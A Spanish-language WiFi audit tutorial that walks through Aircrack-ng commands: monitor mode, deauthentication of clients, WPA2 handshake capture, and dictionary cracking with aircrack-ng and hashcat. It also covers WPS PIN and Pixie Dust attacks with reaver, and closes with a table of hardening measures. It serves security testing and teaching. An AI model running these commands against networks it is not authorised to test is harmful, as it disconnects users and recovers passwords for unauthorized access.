Guía de auditoría de seguridad en redes WiFi con Aircrack-ng: captura del handshake WPA2, cracking con diccionario y configuraciones inseguras como WPS y WEP.
# Listar interfaces WiFi:
iwconfig
airmon-ng
# Comprobar procesos que puedan interferir:
airmon-ng check
# Matar procesos conflictivos:
airmon-ng check kill
# Activar modo monitor:
airmon-ng start wlan0
# Crea la interfaz wlan0mon
# Verificar modo monitor:
iwconfig wlan0mon
# Escanear todas las redes cercanas:
airodump-ng wlan0mon
# Información mostrada:
# BSSID: MAC del punto de acceso
# CH: Canal
# ENC: Cifrado (WPA2, WEP, OPN)
# ESSID: Nombre de la red
# #Data: Paquetes de datos capturados
# STATION: Clientes conectados
# Capturar tráfico de la red objetivo:
airodump-ng -c [CANAL] --bssid [BSSID_AP] -w handshake wlan0mon
# Ejemplo:
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w captura wlan0mon
# Esperar a que un cliente se conecte (handshake natural)
# O forzar desautenticación para capturar el rehandshake:
# (Abrir otra terminal)
aireplay-ng -0 5 -a [BSSID_AP] -c [MAC_CLIENTE] wlan0mon
# -0 5: enviar 5 paquetes deauth
# El cliente se desconecta y reconecta → capturamos el handshake
# Confirmar captura del handshake en la esquina superior derecha:
# "WPA handshake: AA:BB:CC:DD:EE:FF"
# Con Aircrack-ng (CPU) + diccionario:
aircrack-ng -w /usr/share/wordlists/rockyou.txt captura-01.cap
# Con Hashcat (GPU, mucho más rápido):
# Convertir .cap a formato Hashcat:
hcxpcapngtool -o hash.hc22000 captura-01.cap
# Cracking con Hashcat WPA2:
hashcat -a 0 -m 22000 hash.hc22000 rockyou.txt
# Con reglas para aumentar el alcance:
hashcat -a 0 -m 22000 hash.hc22000 rockyou.txt \
-r /usr/share/hashcat/rules/best64.rule
# Escanear redes con WPS activo:
wash -i wlan0mon
# Ataque por fuerza bruta al PIN WPS:
reaver -i wlan0mon -b [BSSID_AP] -vv
# Ataque Pixie Dust (más rápido en APs vulnerables):
reaver -i wlan0mon -b [BSSID_AP] -vv -K 1
| Medida | Descripción |
|---|---|
| Usar WPA3 | Protocolo más seguro. Usa SAE en lugar de PSK. |
| Contraseña larga y aleatoria | Mínimo 20 caracteres. Imposible de crackear por diccionario. |
| Deshabilitar WPS | WPS es vulnerable a ataques de fuerza bruta (PIN de 8 dígitos). |
| Red de invitados | Separar dispositivos IoT y visitas de la red principal. |
| Filtrado MAC | Solo permite MACs autorizadas (evitable con MAC spoofing). |
| SSID oculto | No publicar el nombre de la red (baja eficacia, fácil de descubrir). |